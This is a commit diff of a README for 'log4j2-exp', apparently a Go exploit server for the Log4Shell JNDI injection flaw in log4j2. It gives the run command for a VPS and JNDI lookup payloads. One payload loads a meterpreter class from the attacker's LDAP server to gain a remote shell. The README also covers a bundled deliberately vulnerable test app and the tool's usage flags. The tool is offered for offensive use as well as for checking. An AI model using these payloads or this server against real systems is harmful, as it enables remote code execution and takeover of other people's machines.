|
1 | 1 | # log4j2-exp |
2 | | -Check log4j2 vulnerability easily |
| 2 | + * Check and exploit log4j2 vulnerability with single Go program. |
| 3 | + * You don't need to install anything except develop it. |
| 4 | + * It support ldaps and https server for other usage. |
| 5 | + |
| 6 | +## Run |
| 7 | + ```log4j2-exp.exe -host "VPS IP address"``` |
| 8 | + |
| 9 | + |
| 10 | +## Check |
| 11 | + * run the log4j2-exp server |
| 12 | + * send ```${jndi:ldap://127.0.0.1/nop.class}``` |
| 13 | + |
| 14 | +## Exploit |
| 15 | + * run the log4j2-exp server |
| 16 | + * put your class file to the payload directory |
| 17 | + * send ```${jndi:ldap://127.0.0.1/meterpreter.class}``` |
| 18 | + * will open source after some time |
| 19 | + |
| 20 | +## VulApp |
| 21 | + * VulApp is a vulnerable Java program that use log4j2 package.\ |
| 22 | + * You can use it for develop this project easily.\ |
| 23 | + * ```java -jar vulapp.jar ${jndi:ldap://127.0.0.1/calc.class}``` |
| 24 | + |
| 25 | +## Help |
| 26 | + ``` |
| 27 | + ::: :::::::: :::::::: ::: ::::::::::: :::::::: |
| 28 | + :+: :+: :+: :+: :+: :+: :+: :+: :+: |
| 29 | + +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ |
| 30 | + +#+ +#+ +:+ :#: +#+ +:+ +#+ +#+ |
| 31 | + +#+ +#+ +#+ +#+ +#+# +#+#+#+#+#+ +#+ +#+ |
| 32 | + #+# #+# #+# #+# #+# #+# #+# #+# #+# |
| 33 | + ########## ######## ######## ### ##### ########## |
| 34 | +
|
| 35 | + https://github.com/For-ACGN/log4j2-exp |
| 36 | +
|
| 37 | +Usage of log4j2-exp.exe: |
| 38 | + -dir string |
| 39 | + payload(java class) directory (default "payload") |
| 40 | + -host string |
| 41 | + server IP address or domain name (default "127.0.0.1") |
| 42 | + -http-addr string |
| 43 | + http server address (default ":8080") |
| 44 | + -http-net string |
| 45 | + http server network (default "tcp") |
| 46 | + -ldap-addr string |
| 47 | + ldap server address (default ":389") |
| 48 | + -ldap-net string |
| 49 | + ldap server network (default "tcp") |
| 50 | + -tls |
| 51 | + enable ldaps and https server |
| 52 | + -tls-cert string |
| 53 | + tls certificate file path (default "cert.pem") |
| 54 | + -tls-key string |
| 55 | + tls private key file path (default "key.pem") |
| 56 | + ``` |
| 57 | + |
| 58 | + |
| 59 | +## Screenshot |
| 60 | + |
0 commit comments